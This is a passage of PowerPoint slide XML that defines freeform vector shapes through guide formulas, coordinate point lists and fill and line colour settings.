                  <a:gd name="T107" fmla="*/ 69 h 74"/>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96"/>
                  <a:gd name="T163" fmla="*/ 0 h 74"/>
                  <a:gd name="T164" fmla="*/ 96 w 96"/>
                  <a:gd name="T165" fmla="*/ 74 h 74"/>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96" h="74">
                    <a:moveTo>
                      <a:pt x="60" y="69"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="43" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="69"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36108" name="Freeform 241"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2473" y="2723"/>
                <a:ext cx="44" cy="11"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 5 w 44"/>
                  <a:gd name="T1" fmla="*/ 4 h 11"/>
                  <a:gd name="T2" fmla="*/ 17 w 44"/>
                  <a:gd name="T3" fmla="*/ 4 h 11"/>
                  <a:gd name="T4" fmla="*/ 17 w 44"/>
                  <a:gd name="T5" fmla="*/ 1 h 11"/>
                  <a:gd name="T6" fmla="*/ 19 w 44"/>
                  <a:gd name="T7" fmla="*/ 1 h 11"/>
                  <a:gd name="T8" fmla="*/ 20 w 44"/>
                  <a:gd name="T9" fmla="*/ 0 h 11"/>
                  <a:gd name="T10" fmla="*/ 21 w 44"/>
                  <a:gd name="T11" fmla="*/ 1 h 11"/>
                  <a:gd name="T12" fmla="*/ 24 w 44"/>
                  <a:gd name="T13" fmla="*/ 0 h 11"/>
                  <a:gd name="T14" fmla="*/ 25 w 44"/>
                  <a:gd name="T15" fmla="*/ 0 h 11"/>
                  <a:gd name="T16" fmla="*/ 26 w 44"/>
                  <a:gd name="T17" fmla="*/ 0 h 11"/>
                  <a:gd name="T18" fmla="*/ 27 w 44"/>
                  <a:gd name="T19" fmla="*/ 1 h 11"/>
                  <a:gd name="T20" fmla="*/ 28 w 44"/>
                  <a:gd name="T21" fmla="*/ 2 h 11"/>
                  <a:gd name="T22" fmla="*/ 29 w 44"/>
                  <a:gd name="T23" fmla="*/ 3 h 11"/>
                  <a:gd name="T24" fmla="*/ 30 w 44"/>
                  <a:gd name="T25" fmla="*/ 2 h 11"/>
                  <a:gd name="T26" fmla="*/ 32 w 44"/>
                  <a:gd name="T27" fmla="*/ 2 h 11"/>
                  <a:gd name="T28" fmla="*/ 33 w 44"/>
                  <a:gd name="T29" fmla="*/ 3 h 11"/>
                  <a:gd name="T30" fmla="*/ 33 w 44"/>
                  <a:gd name="T31" fmla="*/ 5 h 11"/>
                  <a:gd name="T32" fmla="*/ 35 w 44"/>
                  <a:gd name="T33" fmla="*/ 6 h 11"/>
                  <a:gd name="T34" fmla="*/ 37 w 44"/>
                  <a:gd name="T35" fmla="*/ 5 h 11"/>
                  <a:gd name="T36" fmla="*/ 38 w 44"/>
                  <a:gd name="T37" fmla="*/ 5 h 11"/>
                  <a:gd name="T38" fmla="*/ 40 w 44"/>
                  <a:gd name="T39" fmla="*/ 4 h 11"/>
                  <a:gd name="T40" fmla="*/ 41 w 44"/>
                  <a:gd name="T41" fmla="*/ 4 h 11"/>
                  <a:gd name="T42" fmla="*/ 43 w 44"/>
                  <a:gd name="T43" fmla="*/ 4 h 11"/>
                  <a:gd name="T44" fmla="*/ 44 w 44"/>
                  <a:gd name="T45" fmla="*/ 6 h 11"/>
                  <a:gd name="T46" fmla="*/ 44 w 44"/>
                  <a:gd name="T47" fmla="*/ 7 h 11"/>
                  <a:gd name="T48" fmla="*/ 43 w 44"/>
                  <a:gd name="T49" fmla="*/ 8 h 11"/>
                  <a:gd name="T50" fmla="*/ 41 w 44"/>
                  <a:gd name="T51" fmla="*/ 8 h 11"/>
                  <a:gd name="T52" fmla="*/ 39 w 44"/>
                  <a:gd name="T53" fmla="*/ 9 h 11"/>
                  <a:gd name="T54" fmla="*/ 38 w 44"/>
                  <a:gd name="T55" fmla="*/ 9 h 11"/>
                  <a:gd name="T56" fmla="*/ 35 w 44"/>
                  <a:gd name="T57" fmla="*/ 9 h 11"/>
                  <a:gd name="T58" fmla="*/ 33 w 44"/>
                  <a:gd name="T59" fmla="*/ 8 h 11"/>
                  <a:gd name="T60" fmla="*/ 31 w 44"/>
                  <a:gd name="T61" fmla="*/ 7 h 11"/>
                  <a:gd name="T62" fmla="*/ 30 w 44"/>
                  <a:gd name="T63" fmla="*/ 8 h 11"/>
                  <a:gd name="T64" fmla="*/ 29 w 44"/>
                  <a:gd name="T65" fmla="*/ 7 h 11"/>
                  <a:gd name="T66" fmla="*/ 29 w 44"/>
                  <a:gd name="T67" fmla="*/ 6 h 11"/>
                  <a:gd name="T68" fmla="*/ 26 w 44"/>
                  <a:gd name="T69" fmla="*/ 6 h 11"/>
                  <a:gd name="T70" fmla="*/ 24 w 44"/>
                  <a:gd name="T71" fmla="*/ 5 h 11"/>
                  <a:gd name="T72" fmla="*/ 23 w 44"/>
                  <a:gd name="T73" fmla="*/ 4 h 11"/>
                  <a:gd name="T74" fmla="*/ 22 w 44"/>
                  <a:gd name="T75" fmla="*/ 4 h 11"/>
                  <a:gd name="T76" fmla="*/ 22 w 44"/>
                  <a:gd name="T77" fmla="*/ 4 h 11"/>
                  <a:gd name="T78" fmla="*/ 22 w 44"/>
                  <a:gd name="T79" fmla="*/ 6 h 11"/>
                  <a:gd name="T80" fmla="*/ 21 w 44"/>
                  <a:gd name="T81" fmla="*/ 7 h 11"/>
                  <a:gd name="T82" fmla="*/ 19 w 44"/>
                  <a:gd name="T83" fmla="*/ 7 h 11"/>
                  <a:gd name="T84" fmla="*/ 17 w 44"/>
                  <a:gd name="T85" fmla="*/ 7 h 11"/>
                  <a:gd name="T86" fmla="*/ 16 w 44"/>
                  <a:gd name="T87" fmla="*/ 7 h 11"/>
                  <a:gd name="T88" fmla="*/ 13 w 44"/>
                  <a:gd name="T89" fmla="*/ 7 h 11"/>
                  <a:gd name="T90" fmla="*/ 12 w 44"/>
                  <a:gd name="T91" fmla="*/ 7 h 11"/>
                  <a:gd name="T92" fmla="*/ 12 w 44"/>
                  <a:gd name="T93" fmla="*/ 11 h 11"/>
                  <a:gd name="T94" fmla="*/ 0 w 44"/>
                  <a:gd name="T95" fmla="*/ 11 h 11"/>
                  <a:gd name="T96" fmla="*/ 0 w 44"/>
                  <a:gd name="T97" fmla="*/ 7 h 11"/>
                  <a:gd name="T98" fmla="*/ 1 w 44"/>
                  <a:gd name="T99" fmla="*/ 6 h 11"/>
                  <a:gd name="T100" fmla="*/ 4 w 44"/>
                  <a:gd name="T101" fmla="*/ 5 h 11"/>
                  <a:gd name="T102" fmla="*/ 5 w 44"/>
                  <a:gd name="T103" fmla="*/ 4 h 11"/>
                  <a:gd name="T104" fmla="*/ 5 w 44"/>
                  <a:gd name="T105" fmla="*/ 4 h 11"/>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44"/>
                  <a:gd name="T160" fmla="*/ 0 h 11"/>
                  <a:gd name="T161" fmla="*/ 44 w 44"/>
                  <a:gd name="T162" fmla="*/ 11 h 11"/>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44" h="11">
                    <a:moveTo>
                      <a:pt x="5" y="4"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="17" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="4"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="96AFCF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36109" name="Freeform 242"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2473" y="2723"/>
                <a:ext cx="44" cy="11"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 5 w 44"/>
                  <a:gd name="T1" fmla="*/ 4 h 11"/>
                  <a:gd name="T2" fmla="*/ 17 w 44"/>
                  <a:gd name="T3" fmla="*/ 4 h 11"/>
                  <a:gd name="T4" fmla="*/ 17 w 44"/>
                  <a:gd name="T5" fmla="*/ 1 h 11"/>
                  <a:gd name="T6" fmla="*/ 19 w 44"/>
                  <a:gd name="T7" fmla="*/ 1 h 11"/>
                  <a:gd name="T8" fmla="*/ 20 w 44"/>
                  <a:gd name="T9" fmla="*/ 0 h 11"/>
                  <a:gd name="T10" fmla="*/ 21 w 44"/>
                  <a:gd name="T11" fmla="*/ 1 h 11"/>
                  <a:gd name="T12" fmla="*/ 24 w 44"/>
                  <a:gd name="T13" fmla="*/ 0 h 11"/>
                  <a:gd name="T14" fmla="*/ 25 w 44"/>
                  <a:gd name="T15" fmla="*/ 0 h 11"/>
                  <a:gd name="T16" fmla="*/ 26 w 44"/>
                  <a:gd name="T17" fmla="*/ 0 h 11"/>
                  <a:gd name="T18" fmla="*/ 27 w 44"/>
                  <a:gd name="T19" fmla="*/ 1 h 11"/>
                  <a:gd name="T20" fmla="*/ 28 w 44"/>
                  <a:gd name="T21" fmla="*/ 2 h 11"/>
                  <a:gd name="T22" fmla="*/ 29 w 44"/>
                  <a:gd name="T23" fmla="*/ 3 h 11"/>
                  <a:gd name="T24" fmla="*/ 30 w 44"/>
                  <a:gd name="T25" fmla="*/ 2 h 11"/>
                  <a:gd name="T26" fmla="*/ 32 w 44"/>
                  <a:gd name="T27" fmla="*/ 2 h 11"/>
                  <a:gd name="T28" fmla="*/ 33 w 44"/>
                  <a:gd name="T29" fmla="*/ 3 h 11"/>
                  <a:gd name="T30" fmla="*/ 33 w 44"/>
                  <a:gd name="T31" fmla="*/ 5 h 11"/>
                  <a:gd name="T32" fmla="*/ 35 w 44"/>
                  <a:gd name="T33" fmla="*/ 6 h 11"/>
                  <a:gd name="T34" fmla="*/ 37 w 44"/>
                  <a:gd name="T35" fmla="*/ 5 h 11"/>
                  <a:gd name="T36" fmla="*/ 38 w 44"/>
                  <a:gd name="T37" fmla="*/ 5 h 11"/>
                  <a:gd name="T38" fmla="*/ 40 w 44"/>
                  <a:gd name="T39" fmla="*/ 4 h 11"/>
                  <a:gd name="T40" fmla="*/ 41 w 44"/>
                  <a:gd name="T41" fmla="*/ 4 h 11"/>
                  <a:gd name="T42" fmla="*/ 43 w 44"/>
                  <a:gd name="T43" fmla="*/ 4 h 11"/>
                  <a:gd name="T44" fmla="*/ 44 w 44"/>
                  <a:gd name="T45" fmla="*/ 6 h 11"/>
                  <a:gd name="T46" fmla="*/ 44 w 44"/>
                  <a:gd name="T47" fmla="*/ 7 h 11"/>
                  <a:gd name="T48" fmla="*/ 43 w 44"/>
                  <a:gd name="T49" fmla="*/ 8 h 11"/>
                  <a:gd name="T50" fmla="*/ 41 w 44"/>
                  <a:gd name="T51" fmla="*/ 8 h 11"/>
                  <a:gd name="T52" fmla="*/ 39 w 44"/>
                  <a:gd name="T53" fmla="*/ 9 h 11"/>
                  <a:gd name="T54" fmla="*/ 38 w 44"/>
                  <a:gd name="T55" fmla="*/ 9 h 11"/>
                  <a:gd name="T56" fmla="*/ 35 w 44"/>
                  <a:gd name="T57" fmla="*/ 9 h 11"/>
                  <a:gd name="T58" fmla="*/ 33 w 44"/>
                  <a:gd name="T59" fmla="*/ 8 h 11"/>
                  <a:gd name="T60" fmla="*/ 31 w 44"/>
                  <a:gd name="T61" fmla="*/ 7 h 11"/>
                  <a:gd name="T62" fmla="*/ 30 w 44"/>
                  <a:gd name="T63" fmla="*/ 8 h 11"/>
                  <a:gd name="T64" fmla="*/ 29 w 44"/>
                  <a:gd name="T65" fmla="*/ 7 h 11"/>
                  <a:gd name="T66" fmla="*/ 29 w 44"/>
                  <a:gd name="T67" fmla="*/ 6 h 11"/>
                  <a:gd name="T68" fmla="*/ 26 w 44"/>
                  <a:gd name="T69" fmla="*/ 6 h 11"/>
                  <a:gd name="T70" fmla="*/ 24 w 44"/>
                  <a:gd name="T71" fmla="*/ 5 h 11"/>
                  <a:gd name="T72" fmla="*/ 23 w 44"/>
                  <a:gd name="T73" fmla="*/ 4 h 11"/>
                  <a:gd name="T74" fmla="*/ 22 w 44"/>
                  <a:gd name="T75" fmla="*/ 4 h 11"/>
                  <a:gd name="T76" fmla="*/ 22 w 44"/>
                  <a:gd name="T77" fmla="*/ 4 h 11"/>
                  <a:gd name="T78" fmla="*/ 22 w 44"/>
                  <a:gd name="T79" fmla="*/ 6 h 11"/>
                  <a:gd name="T80" fmla="*/ 21 w 44"/>
                  <a:gd name="T81" fmla="*/ 7 h 11"/>
                  <a:gd name="T82" fmla="*/ 19 w 44"/>
                  <a:gd name="T83" fmla="*/ 7 h 11"/>
                  <a:gd name="T84" fmla="*/ 17 w 44"/>
                  <a:gd name="T85" fmla="*/ 7 h 11"/>
                  <a:gd name="T86" fmla="*/ 16 w 44"/>
                  <a:gd name="T87" fmla="*/ 7 h 11"/>
                  <a:gd name="T88" fmla="*/ 13 w 44"/>
                  <a:gd name="T89" fmla="*/ 7 h 11"/>
                  <a:gd name="T90" fmla="*/ 12 w 44"/>
                  <a:gd name="T91" fmla="*/ 7 h 11"/>
                  <a:gd name="T92" fmla="*/ 12 w 44"/>
                  <a:gd name="T93" fmla="*/ 11 h 11"/>
                  <a:gd name="T94" fmla="*/ 0 w 44"/>
                  <a:gd name="T95" fmla="*/ 11 h 11"/>
                  <a:gd name="T96" fmla="*/ 0 w 44"/>
                  <a:gd name="T97" fmla="*/ 7 h 11"/>
                  <a:gd name="T98" fmla="*/ 1 w 44"/>
                  <a:gd name="T99" fmla="*/ 6 h 11"/>
                  <a:gd name="T100" fmla="*/ 4 w 44"/>
                  <a:gd name="T101" fmla="*/ 5 h 11"/>
                  <a:gd name="T102" fmla="*/ 5 w 44"/>
                  <a:gd name="T103" fmla="*/ 4 h 11"/>
                  <a:gd name="T104" fmla="*/ 5 w 44"/>
                  <a:gd name="T105" fmla="*/ 4 h 11"/>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44"/>
                  <a:gd name="T160" fmla="*/ 0 h 11"/>
                  <a:gd name="T161" fmla="*/ 44 w 44"/>
                  <a:gd name="T162" fmla="*/ 11 h 11"/>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44" h="11">
                    <a:moveTo>
                      <a:pt x="5" y="4"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="17" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="6"/>
